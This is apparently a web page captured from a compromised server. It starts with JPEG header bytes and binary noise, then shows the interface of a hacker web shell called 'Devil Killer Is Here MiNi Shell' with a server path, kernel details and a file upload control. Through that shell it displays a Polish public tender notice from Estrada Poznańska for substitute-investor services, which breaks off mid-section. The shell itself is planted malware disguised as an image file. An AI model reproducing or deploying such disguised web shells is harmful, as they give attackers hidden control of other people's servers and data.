JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241202/0062795001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji Inwestora zastępczego przy realizacji zadania inwestycyjnego pn .: „Przebudowa budynku Estrady Poznańskiej wraz z dostawą sprzętu i wyposażenia” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ESTRADA POZNAŃSKA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">EP</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000279730</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Masztalarska, 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">61-767</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 61 852 88 33</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@estrada.poznan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.estrada.poznan.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Kancelaria Radców Prawnych Zygmunt Jerzmanowski i Wspólnicy sp. k.</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">7781447425</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Mickiewicza 14</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">60-834</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">+48 61 852 12 78</span></h3> <h3 class="mb-0">1.11.10.) Numer faksu: <span class="normal">48 61 852 12 80</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">zamowienia.estrada@jerzmanowski.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://www.jerzmanowski.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji Inwestora zastępczego przy realizacji zadania inwestycyjnego pn .: „Przebudowa budynku Estrady Poznańskiej wraz z dostawą sprzętu i wyposażenia” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-21f82fce-355e-48b8-9232-5928b2fa834e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00627950</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Rozwój działalności kulturalnej Estrady Poznańskiej – przebudowa budynków wraz z zakupem wyposażenia”, dofinansowany w ramach działania FENX.07.01 Infrastruktura kultury i turystyki kulturowej, Priorytet FENX.07 Kultura Programu Fundusze Europejskie na Infrastrukturę, Klimat, Środowisko 2021-2027; </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/estrada.poznan <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/estrada.poznan</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://platformazakupowa.pl/pn/estrada.poznan</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/estrada.poznan</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. Urz. UE L 119 z dnia 4 maja<br/>2016 r., str. 1; zwanym dalej &#34;RODO&#34;) informujemy, że:<br/>1) administratorem danych osobowych Inwestora Zastępczego jest Estrada Poznańska z<br/>siedzibą przy ul. Masztalarskiej 8, 61-767 Poznań;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się<br/>kontaktować pod adresem e-mail: sekretariat@estrada.poznan.pl oraz adresem<br/>korespondencyjnym Estrady Poznańskiej;<br/>3) dane osobowe wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w<br/>celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia<br/>publicznego, prowadzonym w trybie podstawowym;<br/>4) odbiorcami danych osobowych wykonawcy będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy PZP;<br/>5) dane osobowe wykonawcy będą przechowywane, przez okres określony w Jednolitym<br/>Rzeczowym Wykazie Aktów (JRWA) Estrady Poznańskiej;<br/>6) obowiązek podania przez wykonawcę danych osobowych bezpośrednio wykonawcy<br/>dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy PZP,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7) dane wykonawcy będą przetwarzane w sposób zautomatyzowany oraz tradycyjny i nie<br/>będą profilowane;<br/>8) Wykonawca posiada:<br/>a. na podstawie art. 15 RODO prawo dostępu do danych osobowych wykonawcy<br/>dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie<br/>administratora niewspółmiernie dużego wysiłku, wykonawca może zostać<br/>zobowiązana do wskazania dodatkowych informacji mających na celu<br/>30<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub<br/>daty zakończonego postępowania o udzielenie zamówienia);<br/>b. na podstawie art. 16 RODO prawo do sprostowania danych osobowych wykonawcy<br/>(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy<br/>w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności<br/>protokołu oraz jego załączników);<br/>c. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa<br/>w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania<br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z<br/>uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);<br/>d. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>wykonawca uzna, że przetwarzanie danych osobowych dotyczących wykonawcy,<br/>narusza przepisy RODO;<br/>9) Wykonawcy nie przysługuje:<br/>a. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;<br/>b. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania danych osobowych wykonawcy<br/>jest art. 6 ust. 1 lit. c RODO;<br/>10) Wykonawcy przysługuje prawo wniesienia skargi do organu nadzorczego na niezgodne<br/>z RODO przetwarzanie danych osobowych wykonawcy przez administratora. Organem<br/>właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul.<br/>Stawki 2, 00-193 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. Urz. UE L 119 z dnia 4 maja<br/>2016 r., str. 1; zwanym dalej &#34;RODO&#34;) informujemy, że:<br/>1) administratorem danych osobowych Inwestora Zastępczego jest Estrada Poznańska z<br/>siedzibą przy ul. Masztalarskiej 8, 61-767 Poznań;<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się<br/>kontaktować pod adresem e-mail: sekretariat@estrada.poznan.pl oraz adresem<br/>korespondencyjnym Estrady Poznańskiej;<br/>3) dane osobowe wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w<br/>celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia<br/>publicznego, prowadzonym w trybie podstawowym;<br/>4) odbiorcami danych osobowych wykonawcy będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy PZP;<br/>5) dane osobowe wykonawcy będą przechowywane, przez okres określony w Jednolitym<br/>Rzeczowym Wykazie Aktów (JRWA) Estrady Poznańskiej;<br/>6) obowiązek podania przez wykonawcę danych osobowych bezpośrednio wykonawcy<br/>dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy PZP,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7) dane wykonawcy będą przetwarzane w sposób zautomatyzowany oraz tradycyjny i nie<br/>będą profilowane;<br/>8) Wykonawca posiada:<br/>a. na podstawie art. 15 RODO prawo dostępu do danych osobowych wykonawcy<br/>dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie<br/>administratora niewspółmiernie dużego wysiłku, wykonawca może zostać<br/>zobowiązana do wskazania dodatkowych informacji mających na celu<br/>30<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub<br/>daty zakończonego postępowania o udzielenie zamówienia);<br/>b. na podstawie art. 16 RODO prawo do sprostowania danych osobowych wykonawcy<br/>(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy<br/>w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności<br/>protokołu oraz jego załączników);<br/>c. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa<br/>w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania<br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z<br/>uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);<br/>d. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>wykonawca uzna, że przetwarzanie danych osobowych dotyczących wykonawcy,<br/>narusza przepisy RODO;<br/>9) Wykonawcy nie przysługuje:<br/>a. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;<br/>b. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania danych osobowych wykonawcy<br/>jest art. 6 ust. 1 lit. c RODO;<br/>10) Wykonawcy przysługuje prawo wniesienia skargi do organu nadzorczego na niezgodne<br/>z RODO przetwarzanie danych osobowych wykonawcy przez administratora. Organem<br/>właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul.<br/>Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EP.ZP/271-10/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług obejmujących pełnienie obowiązków<br/>inwestora zastępczego podczas przygotowania i prowadzenia przedsięwzięcia<br/>inwestycyjnego pn.: „Przebudowa budynku Estrady Poznańskiej wraz z dostawą sprzętu i<br/>wyposażenia” (dalej jako: „Zadanie” lub „Inwestycja”), zgodnie z dokumentacją<br/>projektową, Specyfikacjami technicznymi wykonania i odbioru robót budowlanych, SWZ<br/>oraz umową zawartą przez Zamawiającego z Wykonawcą robót budowlanych, umowami z<br/>instytucjami dofinansowującymi Zadanie i zgodnie z obowiązującymi przepisami prawa, tj.<br/>kompleksowa obsługa prawna, finansowa i techniczna Zadania oraz współpraca przy<br/>realizacji umowy o dofinansowanie Zadania.<br/>Zamawiający udostępni Inwestorowi Zastępczemu poglądowo aktualny projekt budowlany i<br/>nowe założenia projektowe (zmiany projektowe) wynikające z aktualnego projektu<br/>budowlanego sporządzonego dla Inwestycji.<br/>W ramach przedmiotu Umowy obowiązkiem Inwestora Zastępczego jest m.in.:<br/>1) Pełnienie nadzoru inwestorskiego zgodnie z obowiązującym polskim Prawem<br/>budowlanym;<br/>2) Kontrola prawidłowości dokumentacji technicznej Inwestycji;<br/>3) Zapewnienie wykonywania przedmiotu umowy zgodnie z wytycznymi dla<br/>nadzorowania Inwestycji współfinansowanych środkami z Unii Europejskiej;<br/>4) Nadzór i kontrola nad właściwym i terminowym wdrażaniem Inwestycji;<br/>5) Reprezentowanie interesów Zamawiającego na budowie w zakresie spraw technicznych<br/>i finansowych w ramach dokumentacji projektowej, prawa budowlanego oraz umów<br/>dot. realizacji Inwestycji;<br/>6) Wspieranie Zamawiającego we wszystkich czynnościach technicznych,<br/>administracyjnych i finansowych związanych z realizacją przedsięwzięcia;<br/>7) Monitorowanie postępu prac, włącznie ze składaniem okresowych<br/>raportów/sprawozdań tego dotyczących, w których będą wzięte pod uwagę zarówno<br/>wskaźniki rzeczowe, jak i finansowe;<br/>8) Zabezpieczenie profesjonalnego i kompletnego nadzoru inwestorskiego nad<br/>prowadzonymi robotami;<br/>9) Współpraca z nadzorem autorskim;<br/>10) Rozwiązywanie bieżących problemów technicznych w trakcie realizacji zadania;<br/>11) Nadzór rzeczowo – terminowy w zakresie przygotowania dokumentów niezbędnych do<br/>uzyskania wszelkich decyzji niezbędnych w procesie inwestycyjnym, w tym decyzji<br/>pozwolenia na użytkowanie;<br/>12) Rzeczowe i finansowe rozliczenie robót budowlanych;<br/>13) Utrzymywanie na bieżąco kontaktu ze wszystkimi uczestnikami Inwestycji oraz<br/>koordynacja sprawozdawczości w zakresie rzeczowym pomiędzy tymi uczestnikami;<br/>14) Kontrola i nadzór nad zgodnością realizacji robót z odpowiednimi wymaganiami<br/>bezpieczeństwa i ochrony zdrowia, bezpieczeństwa przeciwpożarowego, przepisów<br/>związanych z ochroną środowiska;<br/>15) Kontrolowanie zgodności wykonanych robót z dokumentacją projektową, umową i<br/>obowiązującym w trakcie realizacji harmonogramem robót;<br/>16) Organizowanie, minimum raz w tygodniu, rad budowy dotyczących postępu robót z<br/>udziałem przedstawicieli zespołu ds. zarządzania Projektem, wykonawców robót oraz<br/>sporządzanie protokołu z tych spotkań;<br/>17) Uczestnictwo, organizacja oraz przeprowadzenie odbiorów częściowych, końcowych<br/>wg umów oraz odbioru końcowego całej Inwestycji tj. podjęcie wszelkich niezbędnych<br/>czynności dla prawidłowego przeprowadzenia odbiorów, łącznie z powołaniem komisji<br/>odbiorowych oraz przygotowaniem protokołów odbioru w porozumieniu z<br/>Zamawiającym;<br/>18) Dokonanie pełnych rozliczeń końcowych budowy oraz poszczególnych etapów zgodnie<br/>z wymogami dla nadzorowania Inwestycji współfinansowanych środkami z Unii<br/>Europejskiej;<br/>19) Sporządzanie dla Zamawiającego okresowych (miesięcznych) sprawozdań, raportów,<br/>harmonogramów, planów, prognoz wydatków;<br/>20) Uczestniczenie w kontrolach Projektu, w szczególności Instytucji Pośredniczącej,<br/>wyjaśnianie wątpliwości, przygotowanie wspólnie z Zamawiającym pisemnych<br/>wyjaśnień – jeśli taka konieczność zaistnieje;<br/>21) Przygotowanie rozliczenia rzeczowo – finansowego całej Inwestycji w zakresie<br/>obejmującym wycenę powstałych w wyniku Inwestycji środków trwałych.<br/>Szczegółowe obowiązki Inwestora Zastępczego określone zostały w załączniku nr 10 do SWZ – wzorze umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <p class="mb-0">71541000-2 - Usługi zarządzania projektem budowlanym</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">26 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Cena (C) - waga 60 % (max 60 pkt.)<br/>cena najniższa brutto*<br/>C = ------------------------------------------------------------ x 100 x 60 %<br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto<br/>podana przez Wykonawcę w Formularzu Ofertowym, na którą wykonawca składa<br/>ofertę.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie wykonawca poniesie<br/>w związku z realizacją przedmiotu zamówienia.<br/>c) Punktacja przyznawana ofertom w kryterium oceny „Cena” będzie liczona z<br/>dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>24<br/>d) Za najwyżej ocenioną uznana zostanie oferta, która uzyska najwyższą liczbę<br/>punktów.<br/>e) W toku badania i oceny ofert Zamawiający może żądać od wykonawcy wyjaśnień<br/>dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>f) Zamawiający udzieli zamówienia wykonawcy, którego oferta zostanie uznana za<br/>najkorzystniejszą. Jeżeli zamawiający nie będzie prowadził negocjacji, dokona<br/>wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.<br/><br/>Doświadczenie osób przewidzianych do pełnienia funkcji inspektorów nadzoru<br/>podczas realizacji zamówienia (D) – waga 40% (max. 40 pkt.)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) 